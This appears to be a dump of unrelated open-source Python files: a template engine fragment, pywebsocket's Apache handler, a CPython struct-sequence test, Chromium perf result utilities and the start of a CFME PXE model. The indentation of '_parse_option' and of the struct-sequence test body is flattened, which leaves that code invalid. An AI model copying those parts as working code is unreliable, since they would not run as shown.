        matches = partial_re.findall(self._raw_template)
        if matches:
            for match in matches:
                # Strip the leading `![[` and trailing `]]` to get the name.
                name = match[:len(match)-2][3:]
                partials.append(match)
                updated = updated or tmpls[name]._update_template()
        return updated, partials
    def _replace_partials(self, partials):
        """Substitute each ![[...]] marker with its partial's template text,
        then hand the result to the rendering engine."""
        pre_engine = copy.copy(self._raw_template)
        try:
            for match in partials:
                name = match[:len(match)-2][3:]
                # A Jinja template cannot include a Mustache partial, etc.
                if self.extension != tmpls[name].extension:
                    raise Exception("Can't mix template types in partials!")
                logger.debug("""============= Partial =============
  REPLACING: {}
  PARENT TEMPLATE:{}""".format(match, self._file))
                pattern = "({})".format(re.escape(match))
                pattern_regex = re.compile(pattern)
                pre_engine = re.sub(pattern_regex, tmpls[name].template, pre_engine)
            self._raw_to_engine(pre_engine)
        except KeyError:
            raise KeyError("Couldn't find the template {}, as a partial of {}".format(name, self._file_bit))
    def _update_template(self):
        """Reload this template (and its partials) if anything changed on
        disk; returns True when a reload happened."""
        updated = False
        mtime = os.path.getmtime(self._file)
        if self._mtime < mtime:
            pt = arrow.get(self._mtime).format(time_format)
            nt = arrow.get(mtime).format(time_format)
            logger.debug("""\n\r============== Template =================
  Updating template...
  TEMPLATE: %s
  TYPE: %s
  OLD MTIME: %s
  NEW MTIME: %s
""" % (self._file, self.extension, pt, nt))
            self._read_template()
            updated = True
        update, partials = self._parse_partials()
        if update or updated:
            self._replace_partials(partials)
            updated = True
        return updated
    @property
    def template(self):
        # Raw (pre-engine) template text, refreshed in debug mode.
        if dynamic_reloading:
            self._update_template()
        return self._raw_template
    @property
    def config(self):
        # Parsed YAML header (empty dict when the template had none).
        return self._config
    @property
    def extension(self):
        return self._file.rsplit(".", 1)[1]
    @property
    def is_jinja(self):
        return self.extension=="jinja"
    @property
    def is_mustache(self):
        return self.extension=="mustache"
    def render(self, data):
        """Render with `data` merged over the template's own config."""
        if dynamic_reloading:
            self._update_template()
        # Deep-copy so renders can't mutate the template's stored config.
        _data = copy.deepcopy(self._config)
        _data.update(data)
        if(self.is_jinja):
            wat = unicode(self._engine_template.render(_data))
        else:
            result = pystache.render(self._engine_template, _data)
            wat = unicode(result)
        del _data
        return wat
    def __contains__(self, item):
        # Membership/indexing delegate to the YAML config header.
        return item in self._config
    def __getitem__(self, item):
        return self._config[item]
    def __setitem__(self, item, value):
        self._config[item] = value
class template(object):
    """Mutable builder for one rendered page.

    Collects a context dict (title, scripts, stylesheets, ...), the name
    of a content template and an optional "skeleton" base template, then
    renders the content inside the skeleton via the global `tmpls`
    registry.
    """
    def __init__(self, template, request=None, additional_data=None):
        """Set up the default context, optionally seeded with extra data
        and the current request (exposed to templates as `req`)."""
        self._baseData = {
            "title": "",
            "stylesheets": [],
            # Inline CSS accumulated through the `stylesheets` setter.
            # Bug fix: this key was previously missing, so reading the
            # `stylesheets` property (or assigning a CSS string to it)
            # raised KeyError. Mirrors "scripts" below.
            "styles": "",
            "scripts": "",
            "scriptFiles": [],
            "breadcrumbs": False,
            "breadcrumbs_top": False,
        }
        if additional_data:
            self._baseData.update(additional_data)
        if request:
            self._baseData["req"] = request
        self._template = template
        self._base = "skeletons/navbar"
    @property
    def template(self):
        """Name of the content template (key into `tmpls`)."""
        return self._template
    @template.setter
    def template(self, value):
        assert type(value) is str
        self._template = value
    @property
    def skeleton(self):
        """Name of the base (skeleton) template wrapped around the body."""
        return self._base
    @skeleton.setter
    def skeleton(self, value):
        assert type(value) == str
        self._base = value
    @skeleton.deleter
    def skeleton(self):
        # An empty skeleton means render the body template on its own.
        self._base = ""
    @property
    def data(self):
        """The context dict handed to the template engine at render time."""
        return self._baseData
    @data.setter
    def data(self, value):
        assert type(value) == dict
        self._baseData.update(value)
    @property
    def title(self):
        return self._baseData["title"]
    @title.setter
    def title(self, value):
        self._baseData.update({"title": value})
    def append(self, value):
        """Merge `value` (a dict) into the context; alias of `update`."""
        self.data = value
    def update(self, value):
        """Merge `value` (a dict) into the context."""
        self.data = value
    @property
    def scripts(self):
        """Tuple of (script file list, inline JS string)."""
        return self._baseData["scriptFiles"], self._baseData["scripts"]
    @scripts.setter
    def scripts(self, value):
        # A list extends the script-file list; anything else is appended to
        # the inline JS blob.
        if type(value) == list:
            self._baseData["scriptFiles"].extend(value)
        else:
            self._baseData["scripts"] += value
    @property
    def stylesheets(self):
        """Tuple of (stylesheet file list, inline CSS string)."""
        return self._baseData["stylesheets"], self._baseData["styles"]
    @stylesheets.setter
    def stylesheets(self, value):
        # A list extends the stylesheet-file list; anything else is appended
        # to the inline CSS blob.
        if type(value) == list:
            self._baseData["stylesheets"].extend(value)
        else:
            self._baseData["styles"] += value
    @stylesheets.deleter
    def stylesheets(self):
        self._baseData["stylesheets"] = []
    def partial(self, placeholder, template, data=None):
        """Render `template` with the current context (plus `data`) and
        store the result in the context under `placeholder`."""
        try:
            if data is None: data = {}
            assert type(data) is dict
            data.update(self._baseData.copy())
            self._baseData[placeholder] = tmpls[template].render(data)
        except KeyError:
            raise KeyError("Couldn't find the template {} when used as a partial".format(template))
    def render(self):
        """Render the content template, then wrap it in the skeleton.

        The template's own config may override the skeleton (via a `base`
        key) and supply a `theme_color`. Note: this consumes the context,
        so a template instance can only be rendered once.
        """
        data = self._baseData.copy()
        template = tmpls[self._template]
        body = template.render(data)
        data.update(template.config)
        # A template's config block may name its own skeleton.
        if "base" in template:
            base = template["base"]
        else:
            base = self._base
        if not "theme_color" in template and not "theme_color" in data:
            data["theme_color"] = default_theme_color
        if base is not None and base:
            baseTmpl = tmpls[base]
            data["body"] = body
            _render = baseTmpl.render(data)
        else:
            _render = body
        del data
        del self._baseData
        return unicode(_render)
class PartialTemplate(template):
    """A template rendered on its own, without any skeleton wrapper."""
    def render(self):
        """Render just the body template; falsy output becomes ''."""
        context = self._baseData.copy()
        tmpl = tmpls[self._template]
        rendered = tmpl.render(context) or ""
        del context
        return unicode(rendered)
def read_in_templates():
    """Walk `templates_base`, load every .mustache/.jinja file into the
    global `tmpls` registry, then resolve all partial includes."""
    global partials_ready
    global tmpls
    # Parse all template files into a template object
    for top, folders, files in os.walk(templates_base):
        for fi in files:
            base = top.split(templates_base)[1]
            file_name, extension = fi.rsplit('.', 1)
            if extension in ["mustache", "jinja"]:
                # Registry key is the path relative to the base directory
                # minus the extension, e.g. "skeletons/navbar".
                name = '/'.join([base, file_name]).lstrip('/')
                fi = '/'.join([base, fi])
                tmpls[name] = templateFile(fi)
    partials_ready = True
    logger.debug("Parsing templates for partials and performing replacements.")
    # Parse all partials within the templates, replacing the partial text with the
    # given partial, so that we have support for partials in both mustache and
    # jinja with the same syntax (which is currently ![[name/of/partial]])
    # NOTE: iteritems() is Python 2 only.
    for key, tmpl in tmpls.iteritems():
        updated, partials = tmpl._parse_partials()
        tmpl._replace_partials(partials)
| gpl-3.0 |
edunham/servo | tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/headerparserhandler.py | 638 | 9836 | # Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""PythonHeaderParserHandler for mod_pywebsocket.
Apache HTTP Server and mod_python must be configured such that this
function is called to handle WebSocket request.
"""
import logging
from mod_python import apache
from mod_pywebsocket import common
from mod_pywebsocket import dispatch
from mod_pywebsocket import handshake
from mod_pywebsocket import util
# Names of the Apache PythonOption directives this module understands,
# and the lookup tables that translate their string values.
# PythonOption to specify the handler root directory.
_PYOPT_HANDLER_ROOT = 'mod_pywebsocket.handler_root'
# PythonOption to specify the handler scan directory.
# This must be a directory under the root directory.
# The default is the root directory.
_PYOPT_HANDLER_SCAN = 'mod_pywebsocket.handler_scan'
# PythonOption to allow handlers whose canonical path is
# not under the root directory. It's disallowed by default.
# Set this option with value of 'yes' to allow.
_PYOPT_ALLOW_HANDLERS_OUTSIDE_ROOT = (
    'mod_pywebsocket.allow_handlers_outside_root_dir')
# Map from values to their meanings. 'Yes' and 'No' are allowed just for
# compatibility.
_PYOPT_ALLOW_HANDLERS_OUTSIDE_ROOT_DEFINITION = {
    'off': False, 'no': False, 'on': True, 'yes': True}
# (Obsolete option. Ignored.)
# PythonOption to specify to allow handshake defined in Hixie 75 version
# protocol. The default is None (Off)
_PYOPT_ALLOW_DRAFT75 = 'mod_pywebsocket.allow_draft75'
# Map from values to their meanings.
_PYOPT_ALLOW_DRAFT75_DEFINITION = {'off': False, 'on': True}
class ApacheLogHandler(logging.Handler):
    """Wrapper logging.Handler to emit log message to apache's error.log."""
    # Translation from Python logging levels to Apache APLOG levels.
    _LEVELS = {
        logging.DEBUG: apache.APLOG_DEBUG,
        logging.INFO: apache.APLOG_INFO,
        logging.WARNING: apache.APLOG_WARNING,
        logging.ERROR: apache.APLOG_ERR,
        logging.CRITICAL: apache.APLOG_CRIT,
    }
    def __init__(self, request=None):
        """Log through request.log_error when a request is given,
        otherwise through the server-wide apache.log_error."""
        logging.Handler.__init__(self)
        self._log_error = apache.log_error
        if request is not None:
            self._log_error = request.log_error
        # Time and level will be printed by Apache.
        self._formatter = logging.Formatter('%(name)s: %(message)s')
    def emit(self, record):
        """Forward one logging record to Apache's error log."""
        # Levels not present in _LEVELS fall back to DEBUG.
        apache_level = apache.APLOG_DEBUG
        if record.levelno in ApacheLogHandler._LEVELS:
            apache_level = ApacheLogHandler._LEVELS[record.levelno]
        msg = self._formatter.format(record)
        # "server" parameter must be passed to have "level" parameter work.
        # If only "level" parameter is passed, nothing shows up on Apache's
        # log. However, at this point, we cannot get the server object of the
        # virtual host which will process WebSocket requests. The only server
        # object we can get here is apache.main_server. But Wherever (server
        # configuration context or virtual host context) we put
        # PythonHeaderParserHandler directive, apache.main_server just points
        # the main server instance (not any of virtual server instance). Then,
        # Apache follows LogLevel directive in the server configuration context
        # to filter logs. So, we need to specify LogLevel in the server
        # configuration context. Even if we specify "LogLevel debug" in the
        # virtual host context which actually handles WebSocket connections,
        # DEBUG level logs never show up unless "LogLevel debug" is specified
        # in the server configuration context.
        #
        # TODO(tyoshino): Provide logging methods on request object. When
        # request is mp_request object (when used together with Apache), the
        # methods call request.log_error indirectly. When request is
        # _StandaloneRequest, the methods call Python's logging facility which
        # we create in standalone.py.
        self._log_error(msg, apache_level, apache.main_server)
def _configure_logging():
    """Route all Python logging records to Apache's error log."""
    root_logger = logging.getLogger()
    # Apache itself filters messages via its LogLevel directive, so the
    # Python side forwards every level and lets Apache decide what to keep.
    root_logger.setLevel(logging.DEBUG)
    root_logger.addHandler(ApacheLogHandler())
# Install the Apache log handler as soon as this module is imported.
_configure_logging()
# Module-level logger, named after this module for easy filtering.
_LOGGER = logging.getLogger(__name__)
def _parse_option(name, value, definition):
if value is None:
return False
meaning = definition.get(value.lower())
if meaning is None:
raise Exception('Invalid value for PythonOption %s: %r' %
(name, value))
return meaning
def _create_dispatcher():
    """Build the WebSocket resource Dispatcher from Apache PythonOptions.

    Raises when the mandatory handler-root option is absent; non-fatal
    handler-loading problems are only logged as warnings.
    """
    _LOGGER.info('Initializing Dispatcher')
    options = apache.main_server.get_options()
    handler_root = options.get(_PYOPT_HANDLER_ROOT, None)
    if not handler_root:
        raise Exception('PythonOption %s is not defined' % _PYOPT_HANDLER_ROOT,
                        apache.APLOG_ERR)
    # Scan directory defaults to the handler root itself.
    handler_scan = options.get(_PYOPT_HANDLER_SCAN, handler_root)
    allow_handlers_outside_root = _parse_option(
        _PYOPT_ALLOW_HANDLERS_OUTSIDE_ROOT,
        options.get(_PYOPT_ALLOW_HANDLERS_OUTSIDE_ROOT),
        _PYOPT_ALLOW_HANDLERS_OUTSIDE_ROOT_DEFINITION)
    dispatcher = dispatch.Dispatcher(
        handler_root, handler_scan, allow_handlers_outside_root)
    # Surface handler source-loading problems in Apache's log, but keep going.
    for warning in dispatcher.source_warnings():
        apache.log_error(
            'mod_pywebsocket: Warning in source loading: %s' % warning,
            apache.APLOG_WARNING)
    return dispatcher
# Initialize
# Built once at import time and shared by every request.
_dispatcher = _create_dispatcher()
def headerparserhandler(request):
    """Handle request.
    Args:
        request: mod_python request.
    This function is named headerparserhandler because it is the default
    name for a PythonHeaderParserHandler.
    """
    handshake_is_done = False
    try:
        # Fallback to default http handler for request paths for which
        # we don't have request handlers.
        if not _dispatcher.get_handler_suite(request.uri):
            request.log_error(
                'mod_pywebsocket: No handler for resource: %r' % request.uri,
                apache.APLOG_INFO)
            request.log_error(
                'mod_pywebsocket: Fallback to Apache', apache.APLOG_INFO)
            return apache.DECLINED
    except dispatch.DispatchException, e:
        request.log_error(
            'mod_pywebsocket: Dispatch failed for error: %s' % e,
            apache.APLOG_INFO)
        if not handshake_is_done:
            return e.status
    try:
        # The obsolete draft-75 option is parsed for compatibility only.
        allow_draft75 = _parse_option(
            _PYOPT_ALLOW_DRAFT75,
            apache.main_server.get_options().get(_PYOPT_ALLOW_DRAFT75),
            _PYOPT_ALLOW_DRAFT75_DEFINITION)
        try:
            handshake.do_handshake(
                request, _dispatcher, allowDraft75=allow_draft75)
        except handshake.VersionException, e:
            # The client asked for a protocol version we don't speak;
            # advertise the versions we do support so it can retry.
            request.log_error(
                'mod_pywebsocket: Handshake failed for version error: %s' % e,
                apache.APLOG_INFO)
            request.err_headers_out.add(common.SEC_WEBSOCKET_VERSION_HEADER,
                                        e.supported_versions)
            return apache.HTTP_BAD_REQUEST
        except handshake.HandshakeException, e:
            # Handshake for ws/wss failed.
            # Send http response with error status.
            request.log_error(
                'mod_pywebsocket: Handshake failed for error: %s' % e,
                apache.APLOG_INFO)
            return e.status
        handshake_is_done = True
        request._dispatcher = _dispatcher
        # Hand the established connection to the resource handler for the
        # actual WebSocket data transfer; this blocks until the connection
        # is closed.
        _dispatcher.transfer_data(request)
    except handshake.AbortedByUserException, e:
        request.log_error('mod_pywebsocket: Aborted: %s' % e, apache.APLOG_INFO)
    except Exception, e:
        # DispatchException can also be thrown if something is wrong in
        # pywebsocket code. It's caught here, then.
        request.log_error('mod_pywebsocket: Exception occurred: %s\n%s' %
                          (e, util.get_stack_trace()),
                          apache.APLOG_ERR)
        # Unknown exceptions before handshake mean Apache must handle its
        # request with another handler.
        if not handshake_is_done:
            return apache.DECLINED
    # Set assbackwards to suppress response header generation by Apache.
    request.assbackwards = 1
    return apache.DONE  # Return DONE such that no other handlers are invoked.
# vi:sts=4 sw=4 et
| mpl-2.0 |
mancoast/CPythonPyc_test | fail/324_test_structseq.py | 57 | 4010 | import os
import time
import unittest
from test import support
class StructSeqTest(unittest.TestCase):
def test_tuple(self):
t = time.gmtime()
self.assertIsInstance(t, tuple)
astuple = tuple(t)
self.assertEqual(len(t), len(astuple))
self.assertEqual(t, astuple)
# Check that slicing works the same way; at one point, slicing t[i:j] with
# 0 < i < j could produce NULLs in the result.
for i in range(-len(t), len(t)):
self.assertEqual(t[i:], astuple[i:])
for j in range(-len(t), len(t)):
self.assertEqual(t[i:j], astuple[i:j])
for j in range(-len(t), len(t)):
self.assertEqual(t[:j], astuple[:j])
self.assertRaises(IndexError, t.__getitem__, -len(t)-1)
self.assertRaises(IndexError, t.__getitem__, len(t))
for i in range(-len(t), len(t)-1):
self.assertEqual(t[i], astuple[i])
def test_repr(self):
t = time.gmtime()
self.assertTrue(repr(t))
t = time.gmtime(0)
self.assertEqual(repr(t),
"time.struct_time(tm_year=1970, tm_mon=1, tm_mday=1, tm_hour=0, "
"tm_min=0, tm_sec=0, tm_wday=3, tm_yday=1, tm_isdst=0)")
# os.stat() gives a complicated struct sequence.
st = os.stat(__file__)
rep = repr(st)
self.assertTrue(rep.startswith(os.name + ".stat_result"))
self.assertIn("st_mode=", rep)
self.assertIn("st_ino=", rep)
self.assertIn("st_dev=", rep)
def test_concat(self):
t1 = time.gmtime()
t2 = t1 + tuple(t1)
for i in range(len(t1)):
self.assertEqual(t2[i], t2[i+len(t1)])
def test_repeat(self):
t1 = time.gmtime()
t2 = 3 * t1
for i in range(len(t1)):
self.assertEqual(t2[i], t2[i+len(t1)])
self.assertEqual(t2[i], t2[i+2*len(t1)])
def test_contains(self):
t1 = time.gmtime()
for item in t1:
self.assertIn(item, t1)
self.assertNotIn(-42, t1)
def test_hash(self):
t1 = time.gmtime()
self.assertEqual(hash(t1), hash(tuple(t1)))
def test_cmp(self):
t1 = time.gmtime()
t2 = type(t1)(t1)
self.assertEqual(t1, t2)
self.assertTrue(not (t1 < t2))
self.assertTrue(t1 <= t2)
self.assertTrue(not (t1 > t2))
self.assertTrue(t1 >= t2)
self.assertTrue(not (t1 != t2))
def test_fields(self):
t = time.gmtime()
self.assertEqual(len(t), t.n_fields)
self.assertEqual(t.n_fields, t.n_sequence_fields+t.n_unnamed_fields)
def test_constructor(self):
t = time.struct_time
self.assertRaises(TypeError, t)
self.assertRaises(TypeError, t, None)
self.assertRaises(TypeError, t, "123")
self.assertRaises(TypeError, t, "123", dict={})
self.assertRaises(TypeError, t, "123456789", dict=None)
s = "123456789"
self.assertEqual("".join(t(s)), s)
def test_eviltuple(self):
class Exc(Exception):
pass
# Devious code could crash structseqs' contructors
class C:
def __getitem__(self, i):
raise Exc
def __len__(self):
return 9
self.assertRaises(Exc, time.struct_time, C())
def test_reduce(self):
t = time.gmtime()
x = t.__reduce__()
def test_extended_getslice(self):
# Test extended slicing by comparing with list slicing.
t = time.gmtime()
L = list(t)
indices = (0, None, 1, 3, 19, 300, -1, -2, -31, -300)
for start in indices:
for stop in indices:
# Skip step 0 (invalid)
for step in indices[1:]:
self.assertEqual(list(t[start:stop:step]),
L[start:stop:step])
def test_main():
    # Entry point for the old regrtest runner; delegates to test.support.
    support.run_unittest(StructSeqTest)
if __name__ == "__main__":
    test_main()
| gpl-3.0 |
chromium/chromium | tools/perf/core/results_processor/util.py | 5 | 5278 | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import calendar
import datetime
import json
import logging
import os
import requests # pylint: disable=import-error
import multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
import sys
# Identifiers for the two test-path layouts handled by SplitTestPath():
# telemetry uses 'benchmark/story', gtest uses 'Suite.Case'.
TELEMETRY_TEST_PATH_FORMAT = 'telemetry'
GTEST_TEST_PATH_FORMAT = 'gtest'
def ApplyInParallel(function, work_list, on_failure=None):
  """Apply a function to all values in work_list in parallel.

  Failures in individual work items are logged (and reported via on_failure)
  but do not abort the remaining items.

  Args:
    function: A function with one argument.
    work_list: Any iterable with arguments for the function.
    on_failure: A function to run in case of a failure.
  """
  if not work_list:
    return

  try:
    # Note that this is speculatively halved as an attempt to fix
    # crbug.com/953365.
    cpu_count = multiprocessing.cpu_count() // 2
    if sys.platform == 'win32':
      # TODO(crbug.com/1190269) - we can't use more than 56
      # cores on Windows or Python3 may hang.
      cpu_count = min(cpu_count, 56)
  except NotImplementedError:
    # Some platforms can raise a NotImplementedError from cpu_count()
    logging.warning('cpu_count() not implemented.')
    cpu_count = 4
  # On a single-core host the halving above yields 0, and ThreadPool(0)
  # raises ValueError; always keep at least one worker.
  cpu_count = max(cpu_count, 1)
  pool = ThreadPool(min(cpu_count, len(work_list)))

  def function_with_try(arg):
    try:
      function(arg)
    except Exception:  # pylint: disable=broad-except
      # logging exception here is the only way to get a stack trace since
      # multiprocessing's pool implementation does not save that data. See
      # crbug.com/953365.
      logging.exception('Exception while running %s' % function.__name__)
      if on_failure:
        on_failure(arg)

  try:
    pool.imap_unordered(function_with_try, work_list)
    pool.close()
    pool.join()
  finally:
    pool.terminate()
def SplitTestPath(test_result, test_path_format):
  """ Split a test path into test suite name and test case name.

  Telemetry and Gtest have slightly different test path formats.
  Telemetry uses '{benchmark_name}/{story_name}', e.g.
  'system_health.common_desktop/load:news:cnn:2020'.
  Gtest uses '{test_suite_name}.{test_case_name}', e.g.
  'ZeroToFiveSequence/LuciTestResultParameterizedTest.Variant'
  """
  # Map each known format to the character separating suite from case.
  separator_by_format = {
      TELEMETRY_TEST_PATH_FORMAT: '/',
      GTEST_TEST_PATH_FORMAT: '.',
  }
  if test_path_format not in separator_by_format:
    raise ValueError('Unknown test path format: %s' % test_path_format)
  separator = separator_by_format[test_path_format]

  test_path = test_result['testPath']
  if separator not in test_path:
    raise ValueError('Invalid test path: %s' % test_path)
  # Split only on the first separator: story/case names may contain more.
  return test_path.split(separator, 1)
def IsoTimestampToEpoch(timestamp):
  """Convert ISO formatted time to seconds since epoch.

  Accepts timestamps both with and without a fractional-seconds part,
  e.g. '2020-01-01T00:00:00.123456Z' or '2020-01-01T00:00:00Z'.
  """
  try:
    parsed = datetime.datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S.%fZ')
  except ValueError:
    # Fall back to the format without microseconds.
    parsed = datetime.datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%SZ')
  whole_seconds = calendar.timegm(parsed.timetuple())
  return whole_seconds + parsed.microsecond / 1e6
def SetUnexpectedFailure(test_result):
  """Mark a test result as an unexpected failure after a processing error."""
  test_result.update(status='FAIL', expected=False)
  logging.error('Processing failed for test %s', test_result['testPath'])
def TryUploadingResultToResultSink(results):
  """Best-effort upload of test results to the LUCI ResultSink service.

  Reads the ResultSink endpoint configuration from the LUCI_CONTEXT file and
  silently returns when it is unavailable (e.g. when running locally).

  Args:
    results: Iterable of test result dicts with 'testPath', 'status' and
        'expected' keys, plus optional 'runDuration', 'tags' and
        'outputArtifacts'.

  Raises:
    requests.HTTPError: If ResultSink responds with an error status.
  """
  def buildSummaryHtml(artifacts):
    # Using test log as the summary. It is stored in an artifact named logs.txt.
    # dict.has_key() was removed in Python 3; membership must use 'in'.
    if 'logs.txt' in artifacts:
      summary_html = '<p><text-artifact artifact-id="logs.txt"></p>'
    else:
      summary_html = ''
    return summary_html

  def buildArtifacts(artifacts):
    # ResultSink only needs the filePath of each artifact.
    artifacts_result = {}
    for artifact_id, artifact in artifacts.items():
      artifacts_result[artifact_id] = {'filePath': artifact['filePath']}
    return artifacts_result

  def parse(results):
    # Convert internal test result dicts into ResultSink's schema.
    test_results = []
    for test_case in results:
      test_result = {
          'testId': test_case['testPath'],
          'expected': test_case['expected'],
          'status': test_case['status']
      }
      # TODO: go/result-sink#test-result-json-object listed that specifying
      # testMetadata with location info can helped with breaking down flaky
      # tests. We don't have the file location currently in test results.
      if 'runDuration' in test_case:
        test_result['duration'] = '%.9fs' % float(
            test_case['runDuration'].rstrip('s'))
      if 'tags' in test_case:
        test_result['tags'] = test_case['tags']
      if 'outputArtifacts' in test_case:
        test_result['summaryHtml'] = buildSummaryHtml(
            test_case['outputArtifacts'])
        test_result['artifacts'] = buildArtifacts(test_case['outputArtifacts'])
      test_results.append(test_result)
    return test_results

  try:
    with open(os.environ['LUCI_CONTEXT']) as f:
      sink = json.load(f)['result_sink']
  except KeyError:
    # No LUCI_CONTEXT env var or no result_sink section: nothing to upload.
    return
  test_results = parse(results)
  res = requests.post(
      url='http://%s/prpc/luci.resultsink.v1.Sink/ReportTestResults' %
      sink['address'],
      headers={
          'Content-Type': 'application/json',
          'Accept': 'application/json',
          'Authorization': 'ResultSink %s' % sink['auth_token'],
      },
      data=json.dumps({'testResults': test_results}))
  res.raise_for_status()
| bsd-3-clause |
psav/cfme_tests | cfme/infrastructure/pxe.py | 5 | 36894 | # -*- coding: utf-8 -*-
""" A model of a PXE Server in CFME
"""
import attr
from navmazing import NavigateToSibling, NavigateToAttribute
from selenium.common.exceptions import NoSuchElementException
from widgetastic.widget import View, Text, Checkbox
from widgetastic_patternfly import Dropdown, Accordion, BootstrapSelect, Button
from cfme.base import BaseEntity, BaseCollection
from cfme.base.login import BaseLoggedInPage
from cfme.utils import conf, ParamClassName
from cfme.utils.appliance import Navigatable
from cfme.utils.appliance.implementations.ui import navigator, CFMENavigateStep, navigate_to
from cfme.utils.datafile import load_data_file
from cfme.utils.path import project_path
from cfme.utils.pretty import Pretty
from cfme.utils.update import Updateable
from cfme.utils.varmeth import variable
from cfme.utils.wait import wait_for
from widgetastic_manageiq import (ManageIQTree, Input, ScriptBox, SummaryTable, Table, Version,
VersionPick)
class PXEToolBar(View):
    """
    represents PXE toolbar and its controls
    """
    # todo: add back button later
    # The single 'Configuration' dropdown drives all add/edit/remove actions.
    configuration = Dropdown(text='Configuration')
class PXESideBar(View):
    """
    represents left side bar. it usually contains navigation, filters, etc

    Each nested accordion maps to one of the four PXE sections and exposes
    its navigation tree.
    """
    @View.nested
    class servers(Accordion):  # noqa
        ACCORDION_NAME = "PXE Servers"

        tree = ManageIQTree()

    @View.nested
    class templates(Accordion):  # noqa
        ACCORDION_NAME = "Customization Templates"

        tree = ManageIQTree()

    @View.nested
    class image_types(Accordion):  # noqa
        ACCORDION_NAME = "System Image Types"

        tree = ManageIQTree()

    @View.nested
    class datastores(Accordion):  # noqa
        ACCORDION_NAME = "ISO Datastores"

        tree = ManageIQTree()
class PXEMainView(BaseLoggedInPage):
    """
    represents whole All PXE Servers page

    Base view shared by every PXE page: toolbar, sidebar, title and the
    records table.
    """
    toolbar = View.nested(PXEToolBar)
    sidebar = View.nested(PXESideBar)
    title = Text('//div[@id="main-content"]//h1')
    entities = Table(locator='.//div[@id="records_div" or @id="main_div"]//table')

    @property
    def is_displayed(self):
        # Only checks the active navigation breadcrumb; subclasses narrow
        # this further by also matching the page title.
        return self.navigation.currently_selected == ['Compute', 'Infrastructure', 'PXE']
class PXEServersView(PXEMainView):
    """
    represents whole All PXE Servers page
    """
    @property
    def is_displayed(self):
        # Narrow the base check with the exact page title.
        return (super(PXEServersView, self).is_displayed and
                self.title.text == 'All PXE Servers')
class PXEDetailsToolBar(PXEToolBar):
    """
    represents the toolbar which appears when any pxe entity is clicked
    """
    # Button title changed between CFME versions; VersionPick resolves it.
    reload = Button(title=VersionPick({Version.lowest(): 'Reload current display',
                                       '5.9': 'Refresh this page'}))
class PXEServerDetailsView(PXEMainView):
    """
    represents Server Details view
    """
    toolbar = View.nested(PXEDetailsToolBar)

    @View.nested
    class entities(View):  # noqa
        # Summary tables shown on the details page.
        basic_information = SummaryTable(title="Basic Information")
        pxe_image_menus = SummaryTable(title='PXE Image Menus')

    @property
    def is_displayed(self):
        # NOTE(review): always False, so navmazing re-runs the navigation
        # steps every time -- presumably intentional; verify.
        return False
class PXEServerForm(View):
    """Common form widgets shared by the Add and Edit PXE Server views."""
    title = Text('//div[@id="main-content"]//h1')
    # common fields
    name = Input(id='name')
    depot_type = BootstrapSelect(id='log_protocol')
    access_url = Input(id='access_url')
    pxe_dir = Input(id='pxe_directory')
    windows_images_dir = Input(id='windows_images_directory')
    customization_dir = Input(id='customization_directory')
    filename = Input(id='pxemenu_0')
    uri = Input(id='uri')  # both NFS and Samba

    # Samba only
    username = Input(id='log_userid')
    password = Input(id='log_password')
    confirm_password = Input(id='log_verify')
    validate = Button('Validate the credentials by logging into the Server')

    @property
    def is_displayed(self):
        # Shared form base; concrete Add/Edit subclasses are navigated to
        # directly, so displayed-detection is not implemented here.
        return False
class PXEServerAddView(PXEServerForm):
    """
    represents Add New PXE Server view
    """
    add = Button('Add')
    cancel = Button('Cancel')
class PXEServerEditView(PXEServerForm):
    """
    represents PXE Server Edit view
    """
    save = Button('Save')
    reset = Button('Reset')
    cancel = Button('Cancel')
class PXEImageEditView(View):
    """
    it can be found when some image is clicked in PXE Server Tree
    """
    title = Text('//div[@id="main-content"]//h1')
    default_for_windows = Checkbox(id='default_for_windows')
    # The image type selector ('image_typ' is the actual DOM id).
    type = BootstrapSelect(id='image_typ')
    save = Button('Save')
    reset = Button('Reset')
    cancel = Button('Cancel')

    @property
    def is_displayed(self):
        # Reached via tree clicks rather than navmazing detection.
        return False
class PXEServer(Updateable, Pretty, Navigatable):
    """Model of a PXE Server object in CFME

    Args:
        name: Name of PXE server.
        depot_type: Depot type, either Samba or Network File System.
        uri: The Depot URI.
        userid: The Samba username.
        password: The Samba password.
        access_url: HTTP access path for PXE server.
        pxe_dir: The PXE dir for accessing configuration.
        windows_dir: Windows source directory.
        customize_dir: Customization directory for templates.
        menu_filename: Menu filename for iPXE/syslinux menu.
    """
    pretty_attrs = ['name', 'uri', 'access_url']
    _param_name = ParamClassName('name')

    def __init__(self, name=None, depot_type=None, uri=None, userid=None, password=None,
                 access_url=None, pxe_dir=None, windows_dir=None, customize_dir=None,
                 menu_filename=None, appliance=None):
